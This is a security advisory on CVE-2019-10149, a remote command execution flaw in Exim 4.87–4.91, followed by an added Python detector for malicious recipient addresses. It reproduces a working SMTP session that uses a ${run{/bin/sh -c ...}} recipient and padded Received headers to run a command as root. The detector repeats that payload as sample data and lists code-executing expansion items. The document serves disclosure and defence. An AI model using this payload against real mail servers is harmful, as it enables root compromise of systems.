ASA-2019-00320 – Exim: Remote command execution (RCE) via recipient address


Allele Security Alert

ASA-2019-00320

Identifier(s)

ASA-2019-00320, CVE-2019-10149

Title

Remote command execution (RCE) via recipient address

Vendor(s)

The Exim Maintainers

Product(s)

Exim

Affected version(s)

Exim versions from 4.87 to 4.91

Fixed version(s)

Exim version 4.92

Proof of concept

Unknown

Description

A flaw was found in the way Exim validated recipient addresses. A remote attacker could use this flaw to execute arbitrary commands on the Exim server with the permissions of the user running the application.

Technical details

The vulnerable code is located in deliver_message():

#ifndef DISABLE_EVENT
if (process_recipients != RECIP_ACCEPT)
  {
  uschar * save_local = deliver_localpart;
  const uschar * save_domain = deliver_domain;

  /* new->address is the (attacker-supplied) recipient; expand_string()
     interprets expansion items such as ${run{...}} found inside it. */
  deliver_localpart = expand_string(
    string_sprintf("${local_part:%s}", new->address));
  deliver_domain = expand_string(
    string_sprintf("${domain:%s}", new->address));

  (void) event_raise(event_action,
    US"msg:fail:internal", new->message);

  deliver_localpart = save_local;
  deliver_domain = save_domain;
  }
#endif

Because expand_string() recognizes the “${run{<command> <args>}}” expansion item, and because new->address is the recipient of the mail that is being delivered, a local attacker can simply send a mail to “${run{…}}@localhost” (where “localhost” is one of Exim’s local_domains) and execute arbitrary commands, as root (deliver_drop_privilege is false, by default):

john@debian:~$ cat /tmp/id
cat: /tmp/id: No such file or directory

john@debian:~$ nc 127.0.0.1 25
220 debian ESMTP Exim 4.89 Thu, 23 May 2019 09:10:41 -0400
HELO localhost
250 debian Hello localhost [127.0.0.1]
MAIL FROM:<>
250 OK
RCPT TO:<${run{\x2Fbin\x2Fsh\t-c\t\x22id\x3E\x3E\x2Ftmp\x2Fid\x22}}@localhost>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31

.
250 OK id=1hTnYa-0000zp-8b
QUIT
221 debian closing connection

john@debian:~$ cat /tmp/id
cat: /tmp/id: Permission denied

root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)

In this example:

– we send more than received_headers_max (30, by default) “Received:” headers to the mail server, to set process_recipients to RECIP_FAIL_LOOP and hence execute the vulnerable code;

– we escape invalid characters in the recipient’s address with backslashes, which are conveniently interpreted by expand_string() (in expand_string_internal() and transport_set_up_command()).
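As an added defender-side example (not part of this alert, the Qualys advisory or Exim's own code), the following Python scans SMTP transcript lines for RCPT TO addresses whose local part carries Exim expansion syntax and undoes the backslash escapes described above so the payload can be read in plain form. The RCPT_RE, EXPANSION_RE and CODE_EXEC_ITEMS names are this example's own; the item names other than run are further Exim expansion items assumed here rather than taken from the alert.

```python
import re

# The recipient inside an SMTP "RCPT TO:<...>" command.
RCPT_RE = re.compile(r"^RCPT\s+TO:\s*<([^>]*)>", re.IGNORECASE)
# An Exim expansion item: "${" followed by the item name, e.g. "${run{".
EXPANSION_RE = re.compile(r"\$\{\s*([A-Za-z_]+)")
# A backslash escape as expand_string() reads it: \xNN or \<any single char>.
_ESC_RE = re.compile(r"\\(x[0-9A-Fa-f]{2}|.)", re.DOTALL)
# Items that run code or read files/sockets when expanded. "run" is the one the
# alert shows; the others are further Exim expansion items (assumed, not from the alert).
CODE_EXEC_ITEMS = {"run", "readsocket", "readfile", "perl", "dlfunc"}

def unescape_exim(s):
    # Undo the escapes: \xNN -> byte, \t \n \r -> control char, \c -> c.
    def one(m):
        e = m.group(1)
        if e[0] == "x" and len(e) == 3:
            return chr(int(e[1:], 16))
        return {"t": "\t", "n": "\n", "r": "\r"}.get(e, e)
    return _ESC_RE.sub(one, s)

def inspect_recipient(address):
    # Return a finding when the local part carries "${...}" syntax, else None.
    local_part = address.rsplit("@", 1)[0]
    items = EXPANSION_RE.findall(local_part)
    if not items:
        return None
    return {
        "address": address,
        "items": items,
        "code_exec": bool(CODE_EXEC_ITEMS & {i.lower() for i in items}),
        "decoded_local_part": unescape_exim(local_part),
    }

def scan_smtp_transcript(lines):
    # Flag every RCPT TO whose recipient carries expansion syntax.
    findings = []
    for line in lines:
        m = RCPT_RE.match(line.strip())
        finding = m and inspect_recipient(m.group(1))
        if finding:
            findings.append(finding)
    return findings

# Constructed transcript lines: one benign recipient, one shaped like the alert's payload.
SAMPLE = [
    "RCPT TO:<john@localhost>",
    "RCPT TO:<${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22id\\x3E\\x3E\\x2Ftmp\\x2Fid\\x22}}@localhost>",
]
```

A legitimate local part has no reason to contain "${", so any finding from this scan is worth rejecting at the RCPT stage and reviewing in the mail logs.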

Credits

Qualys Research Labs

Reference(s)

CVE-2019-10149: Exim 4.87 to 4.91: possible remote exploit
https://seclists.org/oss-sec/2019/q2/140

CVE-2019-10149 Exim 4.87 to 4.91
https://www.exim.org/static/doc/security/CVE-2019-10149.txt

Fix CVE-2019-10149
https://git.exim.org/exim.git/commit/d740d2111f189760593a303124ff6b9b1f83453d

Exim CVE-2019-10149, how to protect yourself
https://blog.cpanel.com/exim-cve-2019-10149-protect-yourself/

Qualys Security Advisory – The Return of the WIZard: RCE in Exim (CVE-2019-10149)
https://seclists.org/oss-sec/2019/q2/153

CVE-2019-10149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10149

CVE-2019-10149
https://nvd.nist.gov/vuln/detail/CVE-2019-10149

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 8, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.